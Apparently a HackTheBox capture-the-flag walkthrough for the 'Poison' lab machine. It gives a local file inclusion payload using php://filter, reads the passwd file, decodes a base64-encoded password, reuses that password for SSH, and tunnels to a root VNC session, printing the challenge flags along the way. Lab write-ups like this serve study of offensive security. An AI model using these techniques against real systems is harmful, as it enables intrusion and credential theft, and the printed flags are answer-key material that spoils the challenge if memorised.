[HTB Notes] Poison

1.Check open ports
 nmap -sC -sV -oA poison 10.10.10.84
# 22/tcp   open  tcpwrapped
# | ssh-hostkey:
# |   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
# |   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
# |_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (EdDSA)
# 80/tcp   open  tcpwrapped
# |_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
# |_http-title: Site doesn't have a title (text/html; charset=UTF-8).

2.Navigate to http://10.10.10.84/
[x] Submit “listfiles.php”
[-] [8] => pwdbackup.txt
[x] Submit “pwdbackup.txt”
#This password is secure, it's encoded atleast 13 times.. what could go wrong really..
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=
[x] Save hash from “pwdbackup.txt” locally then decrypt
[x] Pipe the base64 command 13 times
 base64 --decode pwdbackup.txt | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d
# Charix!2#4%6&8(0
[x] Abuse HTTP GET parameter for LFI (Local File Inclusion)
[-] root:*:0:0:Charlie &:/root:/bin/csh
[-] charix:*:1001:1001:charix:/home/charix:/bin/csh
[>] You can encode source code files to get unfiltered PHP tags
[x] ?file=php://filter/convert.base64-encode/resource=_file_
[x] Decrypt the encoded file to see source code using base64

3. Generate User Shell
 ssh -l charix 10.10.10.84
# Password for charix@Poison: Charix!2#4%6&8(0
[x] While inside shell:
 ls -la
# -rw-r-----  1 root    charix   166 Mar 19 16:35 secret.zip
# -rw-r-----  1 root    charix    33 Mar 19 16:11 user.txt
cat ~/user.txt
# eaacdfb2d141b72a589233063604209c
ps -auww | grep root
# Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes
# -auth /root/.Xauthority -geometry 1280x800 -depth 24
# -rfbwait 120000 -rfbauth /root/.vnc/passwd
# -rfbport 5901 -localhost -nolisten tcp :1
#
# Notice Xvnc service runs on port 5901
exit
# for now
[x] In your local terminal:
 scp charix@10.10.10.84:secret.zip /destination_directory
# Password for charix@Poison: Charix!2#4%6&8(0

4. Attempt Privilege Escalation (charix -> root)
[x] Extract contents of “secret.zip” file
[x] PASSWORD: Charix!2#4%6&8(0
[x] “secret.zip” contains “secret” file
[x] File contents are just gibberish but it will be useful
[x] Reopen shell but forward port 5901
 ssh -L 5902:localhost:5901 -l charix 10.10.10.84
# Password for charix@Poison: Charix!2#4%6&8(0
[x] In your local terminal:
 vncviewer -passwd secret localhost:5902
# Desktop name "root's X desktop (Poison:1)"
[x] Inside vncviewer:
cat root.txt
# 716d04b188419cf2bb99d891272361f5

SIDENOTES:
[x] Password reuse became a weakness for this box